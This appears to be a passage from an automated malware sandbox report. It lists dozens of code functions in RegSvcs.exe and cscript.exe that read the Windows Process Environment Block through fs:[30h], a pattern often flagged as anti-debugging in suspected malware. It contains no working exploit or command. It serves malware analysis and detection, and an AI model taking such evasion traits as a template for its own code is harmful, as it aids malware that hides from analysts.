            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B05AC mov eax, dword ptr fs:[00000030h]6_2_016B05AC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E2D8A mov eax, dword ptr fs:[00000030h]6_2_015E2D8A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E2D8A mov eax, dword ptr fs:[00000030h]6_2_015E2D8A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E2D8A mov eax, dword ptr fs:[00000030h]6_2_015E2D8A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E2D8A mov eax, dword ptr fs:[00000030h]6_2_015E2D8A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E2D8A mov eax, dword ptr fs:[00000030h]6_2_015E2D8A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01611DB5 mov eax, dword ptr fs:[00000030h]6_2_01611DB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01611DB5 mov eax, dword ptr fs:[00000030h]6_2_01611DB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01611DB5 mov eax, dword ptr fs:[00000030h]6_2_01611DB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01612581 mov eax, dword ptr fs:[00000030h]6_2_01612581
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01612581 mov eax, dword ptr fs:[00000030h]6_2_01612581
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01612581 mov eax, dword ptr fs:[00000030h]6_2_01612581
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01612581 mov eax, dword ptr fs:[00000030h]6_2_01612581
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161FD9B mov eax, dword ptr fs:[00000030h]6_2_0161FD9B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161FD9B mov eax, dword ptr fs:[00000030h]6_2_0161FD9B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160746D mov eax, dword ptr fs:[00000030h]6_2_0160746D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161A44B mov eax, dword ptr fs:[00000030h]6_2_0161A44B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167C450 mov eax, dword ptr fs:[00000030h]6_2_0167C450
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167C450 mov eax, dword ptr fs:[00000030h]6_2_0167C450
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161BC2C mov eax, dword ptr fs:[00000030h]6_2_0161BC2C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B740D mov eax, dword ptr fs:[00000030h]6_2_016B740D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B740D mov eax, dword ptr fs:[00000030h]6_2_016B740D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B740D mov eax, dword ptr fs:[00000030h]6_2_016B740D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]6_2_016A1C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]6_2_016A1C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]6_2_016A1C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]6_2_016A1C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]6_2_016A1C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]6_2_016A1C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]6_2_016A1C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]6_2_016A1C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]6_2_016A1C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]6_2_016A1C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]6_2_016A1C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]6_2_016A1C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]6_2_016A1C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]6_2_016A1C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666C0A mov eax, dword ptr fs:[00000030h]6_2_01666C0A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666C0A mov eax, dword ptr fs:[00000030h]6_2_01666C0A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666C0A mov eax, dword ptr fs:[00000030h]6_2_01666C0A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666C0A mov eax, dword ptr fs:[00000030h]6_2_01666C0A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A14FB mov eax, dword ptr fs:[00000030h]6_2_016A14FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666CF0 mov eax, dword ptr fs:[00000030h]6_2_01666CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666CF0 mov eax, dword ptr fs:[00000030h]6_2_01666CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666CF0 mov eax, dword ptr fs:[00000030h]6_2_01666CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B8CD6 mov eax, dword ptr fs:[00000030h]6_2_016B8CD6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F849B mov eax, dword ptr fs:[00000030h]6_2_015F849B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B8F6A mov eax, dword ptr fs:[00000030h]6_2_016B8F6A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FEF40 mov eax, dword ptr fs:[00000030h]6_2_015FEF40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FFF60 mov eax, dword ptr fs:[00000030h]6_2_015FFF60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161E730 mov eax, dword ptr fs:[00000030h]6_2_0161E730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B070D mov eax, dword ptr fs:[00000030h]6_2_016B070D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B070D mov eax, dword ptr fs:[00000030h]6_2_016B070D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161A70E mov eax, dword ptr fs:[00000030h]6_2_0161A70E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161A70E mov eax, dword ptr fs:[00000030h]6_2_0161A70E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E4F2E mov eax, dword ptr fs:[00000030h]6_2_015E4F2E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E4F2E mov eax, dword ptr fs:[00000030h]6_2_015E4F2E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160F716 mov eax, dword ptr fs:[00000030h]6_2_0160F716
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167FF10 mov eax, dword ptr fs:[00000030h]6_2_0167FF10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167FF10 mov eax, dword ptr fs:[00000030h]6_2_0167FF10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016237F5 mov eax, dword ptr fs:[00000030h]6_2_016237F5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F8794 mov eax, dword ptr fs:[00000030h]6_2_015F8794
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01667794 mov eax, dword ptr fs:[00000030h]6_2_01667794
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01667794 mov eax, dword ptr fs:[00000030h]6_2_01667794
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01667794 mov eax, dword ptr fs:[00000030h]6_2_01667794
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160AE73 mov eax, dword ptr fs:[00000030h]6_2_0160AE73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160AE73 mov eax, dword ptr fs:[00000030h]6_2_0160AE73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160AE73 mov eax, dword ptr fs:[00000030h]6_2_0160AE73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160AE73 mov eax, dword ptr fs:[00000030h]6_2_0160AE73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160AE73 mov eax, dword ptr fs:[00000030h]6_2_0160AE73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F7E41 mov eax, dword ptr fs:[00000030h]6_2_015F7E41
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F7E41 mov eax, dword ptr fs:[00000030h]6_2_015F7E41
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F7E41 mov eax, dword ptr fs:[00000030h]6_2_015F7E41
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F7E41 mov eax, dword ptr fs:[00000030h]6_2_015F7E41
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F7E41 mov eax, dword ptr fs:[00000030h]6_2_015F7E41
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F7E41 mov eax, dword ptr fs:[00000030h]6_2_015F7E41
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F766D mov eax, dword ptr fs:[00000030h]6_2_015F766D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0169FE3F mov eax, dword ptr fs:[00000030h]6_2_0169FE3F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EC600 mov eax, dword ptr fs:[00000030h]6_2_015EC600
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EC600 mov eax, dword ptr fs:[00000030h]6_2_015EC600
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EC600 mov eax, dword ptr fs:[00000030h]6_2_015EC600
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01618E00 mov eax, dword ptr fs:[00000030h]6_2_01618E00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1608 mov eax, dword ptr fs:[00000030h]6_2_016A1608
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161A61C mov eax, dword ptr fs:[00000030h]6_2_0161A61C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161A61C mov eax, dword ptr fs:[00000030h]6_2_0161A61C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EE620 mov eax, dword ptr fs:[00000030h]6_2_015EE620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016116E0 mov ecx, dword ptr fs:[00000030h]6_2_016116E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01628EC7 mov eax, dword ptr fs:[00000030h]6_2_01628EC7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0169FEC0 mov eax, dword ptr fs:[00000030h]6_2_0169FEC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016136CC mov eax, dword ptr fs:[00000030h]6_2_016136CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B8ED6 mov eax, dword ptr fs:[00000030h]6_2_016B8ED6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F76E2 mov eax, dword ptr fs:[00000030h]6_2_015F76E2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016646A7 mov eax, dword ptr fs:[00000030h]6_2_016646A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B0EA5 mov eax, dword ptr fs:[00000030h]6_2_016B0EA5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B0EA5 mov eax, dword ptr fs:[00000030h]6_2_016B0EA5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B0EA5 mov eax, dword ptr fs:[00000030h]6_2_016B0EA5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167FE87 mov eax, dword ptr fs:[00000030h]6_2_0167FE87
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EB1E1 mov eax, dword ptr fs:[00000030h]10_2_047EB1E1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EB1E1 mov eax, dword ptr fs:[00000030h]10_2_047EB1E1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FD5E0 mov eax, dword ptr fs:[00000030h]10_2_047FD5E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FD5E0 mov eax, dword ptr fs:[00000030h]10_2_047FD5E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04804120 mov eax, dword ptr fs:[00000030h]10_2_04804120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04804120 mov eax, dword ptr fs:[00000030h]10_2_04804120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04804120 mov eax, dword ptr fs:[00000030h]10_2_04804120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04804120 mov eax, dword ptr fs:[00000030h]10_2_04804120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04804120 mov ecx, dword ptr fs:[00000030h]10_2_04804120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0486A537 mov eax, dword ptr fs:[00000030h]10_2_0486A537
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04814D3B mov eax, dword ptr fs:[00000030h]10_2_04814D3B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04814D3B mov eax, dword ptr fs:[00000030h]10_2_04814D3B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04814D3B mov eax, dword ptr fs:[00000030h]10_2_04814D3B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481513A mov eax, dword ptr fs:[00000030h]10_2_0481513A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481513A mov eax, dword ptr fs:[00000030h]10_2_0481513A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B8D34 mov eax, dword ptr fs:[00000030h]10_2_048B8D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04823D43 mov eax, dword ptr fs:[00000030h]10_2_04823D43
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480B944 mov eax, dword ptr fs:[00000030h]10_2_0480B944
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480B944 mov eax, dword ptr fs:[00000030h]10_2_0480B944
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04863540 mov eax, dword ptr fs:[00000030h]10_2_04863540
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04807D50 mov eax, dword ptr fs:[00000030h]10_2_04807D50
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E2D8A mov eax, dword ptr fs:[00000030h]10_2_047E2D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E2D8A mov eax, dword ptr fs:[00000030h]10_2_047E2D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E2D8A mov eax, dword ptr fs:[00000030h]10_2_047E2D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E2D8A mov eax, dword ptr fs:[00000030h]10_2_047E2D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E2D8A mov eax, dword ptr fs:[00000030h]10_2_047E2D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480C577 mov eax, dword ptr fs:[00000030h]10_2_0480C577
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480C577 mov eax, dword ptr fs:[00000030h]10_2_0480C577
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487FE87 mov eax, dword ptr fs:[00000030h]10_2_0487FE87
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F766D mov eax, dword ptr fs:[00000030h]10_2_047F766D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481D294 mov eax, dword ptr fs:[00000030h]10_2_0481D294
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481D294 mov eax, dword ptr fs:[00000030h]10_2_0481D294
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048646A7 mov eax, dword ptr fs:[00000030h]10_2_048646A7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B0EA5 mov eax, dword ptr fs:[00000030h]10_2_048B0EA5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B0EA5 mov eax, dword ptr fs:[00000030h]10_2_048B0EA5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B0EA5 mov eax, dword ptr fs:[00000030h]10_2_048B0EA5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481FAB0 mov eax, dword ptr fs:[00000030h]10_2_0481FAB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E9240 mov eax, dword ptr fs:[00000030h]10_2_047E9240
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E9240 mov eax, dword ptr fs:[00000030h]10_2_047E9240
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E9240 mov eax, dword ptr fs:[00000030h]10_2_047E9240
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E9240 mov eax, dword ptr fs:[00000030h]10_2_047E9240
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F7E41 mov eax, dword ptr fs:[00000030h]10_2_047F7E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F7E41 mov eax, dword ptr fs:[00000030h]10_2_047F7E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F7E41 mov eax, dword ptr fs:[00000030h]10_2_047F7E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F7E41 mov eax, dword ptr fs:[00000030h]10_2_047F7E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F7E41 mov eax, dword ptr fs:[00000030h]10_2_047F7E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F7E41 mov eax, dword ptr fs:[00000030h]10_2_047F7E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04828EC7 mov eax, dword ptr fs:[00000030h]10_2_04828EC7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0489FEC0 mov eax, dword ptr fs:[00000030h]10_2_0489FEC0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048136CC mov eax, dword ptr fs:[00000030h]10_2_048136CC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B8ED6 mov eax, dword ptr fs:[00000030h]10_2_048B8ED6
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EE620 mov eax, dword ptr fs:[00000030h]10_2_047EE620
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048116E0 mov ecx, dword ptr fs:[00000030h]10_2_048116E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F8A0A mov eax, dword ptr fs:[00000030h]10_2_047F8A0A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EC600 mov eax, dword ptr fs:[00000030h]10_2_047EC600
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EC600 mov eax, dword ptr fs:[00000030h]10_2_047EC600
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EC600 mov eax, dword ptr fs:[00000030h]10_2_047EC600
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04803A1C mov eax, dword ptr fs:[00000030h]10_2_04803A1C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F76E2 mov eax, dword ptr fs:[00000030h]10_2_047F76E2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481A61C mov eax, dword ptr fs:[00000030h]10_2_0481A61C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481A61C mov eax, dword ptr fs:[00000030h]10_2_0481A61C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0489FE3F mov eax, dword ptr fs:[00000030h]10_2_0489FE3F
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FAAB0 mov eax, dword ptr fs:[00000030h]10_2_047FAAB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FAAB0 mov eax, dword ptr fs:[00000030h]10_2_047FAAB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04874257 mov eax, dword ptr fs:[00000030h]10_2_04874257
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E52A5 mov eax, dword ptr fs:[00000030h]10_2_047E52A5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E52A5 mov eax, dword ptr fs:[00000030h]10_2_047E52A5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E52A5 mov eax, dword ptr fs:[00000030h]10_2_047E52A5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E52A5 mov eax, dword ptr fs:[00000030h]10_2_047E52A5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E52A5 mov eax, dword ptr fs:[00000030h]10_2_047E52A5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0489B260 mov eax, dword ptr fs:[00000030h]10_2_0489B260
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0489B260 mov eax, dword ptr fs:[00000030h]10_2_0489B260
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B8A62 mov eax, dword ptr fs:[00000030h]10_2_048B8A62
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480AE73 mov eax, dword ptr fs:[00000030h]10_2_0480AE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480AE73 mov eax, dword ptr fs:[00000030h]10_2_0480AE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480AE73 mov eax, dword ptr fs:[00000030h]10_2_0480AE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480AE73 mov eax, dword ptr fs:[00000030h]10_2_0480AE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480AE73 mov eax, dword ptr fs:[00000030h]10_2_0480AE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0482927A mov eax, dword ptr fs:[00000030h]10_2_0482927A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A138A mov eax, dword ptr fs:[00000030h]10_2_048A138A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0489D380 mov ecx, dword ptr fs:[00000030h]10_2_0489D380
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481B390 mov eax, dword ptr fs:[00000030h]10_2_0481B390
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04867794 mov eax, dword ptr fs:[00000030h]10_2_04867794
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04867794 mov eax, dword ptr fs:[00000030h]10_2_04867794
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04867794 mov eax, dword ptr fs:[00000030h]10_2_04867794
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EDB60 mov ecx, dword ptr fs:[00000030h]10_2_047EDB60
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FFF60 mov eax, dword ptr fs:[00000030h]10_2_047FFF60
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EF358 mov eax, dword ptr fs:[00000030h]10_2_047EF358
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B5BA5 mov eax, dword ptr fs:[00000030h]10_2_048B5BA5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EDB40 mov eax, dword ptr fs:[00000030h]10_2_047EDB40
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FEF40 mov eax, dword ptr fs:[00000030h]10_2_047FEF40
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E4F2E mov eax, dword ptr fs:[00000030h]10_2_047E4F2E
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E4F2E mov eax, dword ptr fs:[00000030h]10_2_047E4F2E
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048237F5 mov eax, dword ptr fs:[00000030h]10_2_048237F5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B070D mov eax, dword ptr fs:[00000030h]10_2_048B070D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B070D mov eax, dword ptr fs:[00000030h]10_2_048B070D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481A70E mov eax, dword ptr fs:[00000030h]10_2_0481A70E
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481A70E mov eax, dword ptr fs:[00000030h]10_2_0481A70E
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A131B mov eax, dword ptr fs:[00000030h]10_2_048A131B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480F716 mov eax, dword ptr fs:[00000030h]10_2_0480F716
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487FF10 mov eax, dword ptr fs:[00000030h]10_2_0487FF10
